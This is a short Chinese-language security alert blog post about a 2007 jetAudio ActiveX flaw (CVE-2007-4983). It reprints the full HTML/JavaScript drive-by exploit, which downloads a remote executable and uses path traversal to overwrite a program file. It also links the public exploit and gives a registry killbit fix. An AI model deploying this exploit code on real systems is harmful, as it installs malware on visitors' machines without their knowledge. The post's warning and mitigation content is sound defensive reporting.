紧急警报！网马漏洞又出新0-Day！汗！

刚收到线报，网马漏洞又出新0-Day！

jetAudio 7.x ActiveX DownloadFromMusicStore() Code Execution Exploit

该漏洞在2007年的9月19日由 h07安全组织的Krystian Kloskowski (h07@interia.pl) 发步，其漏洞攻击代码发布在milw0rm.com 上，文章为

jetAudio 7.x ActiveX DownloadFromMusicStore() Code Execution Exploit

今天就发现了一个利用该漏洞进行挂马的病毒，代码如下：

<HTML>
<!--
jetAudio 7.x ActiveX DownloadFromMusicStore() 0day Remote Code Execution Exploit
Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
Tested on:..
- jetAudio 7.0.3 Basic
- Microsoft Internet Explorer 6
Just for fun    ;)
-->

<object id="obj" classid="clsid:8D1636FD-CA49-4B4E-90E4-0A20E03A15E8"></object>

<script>
var target = "DownloadFromMusicStore";
//>rename evil.exe evil.mp3
var url = "http://***.exe
var dst = "..\\..\\..\\..\\..\\..\\..\\..\\Program Files\\JetAudio\\JetAudio.exe";
var title = "0day";
var artist = "h07";
var album = "for fun";
var genere = "exploit";
var size = 256;
var param1 = 0;
var param2 = 0;
obj[target](url, dst, title, artist, album, genere, size, param1, param2);
</script>
</HTML>

该漏洞可以将病毒文件*.exe 下载并替换成Program Files\\JetAudio\\JetAudio.exe应用软件，其实这可以替换成任意文件，也可以添加到开机自启动目录中，等待下次开机执行病毒，阴险啊～～～

该漏洞的CVE数据库信息：

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4983

参考代码（我是叫你参考，可没叫你干别的意思～～～）：

http://milw0rm.com/exploits/4427

目前官方还没升级该漏洞的补丁，临时解决办法是在注册表中设置相应的
killbit 。

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{8D1636FD-CA49-4B4E-90E4-0A20E03A15E8}]
"Compatibility Flags"=dword:00000400

我会进一步关注该漏洞的～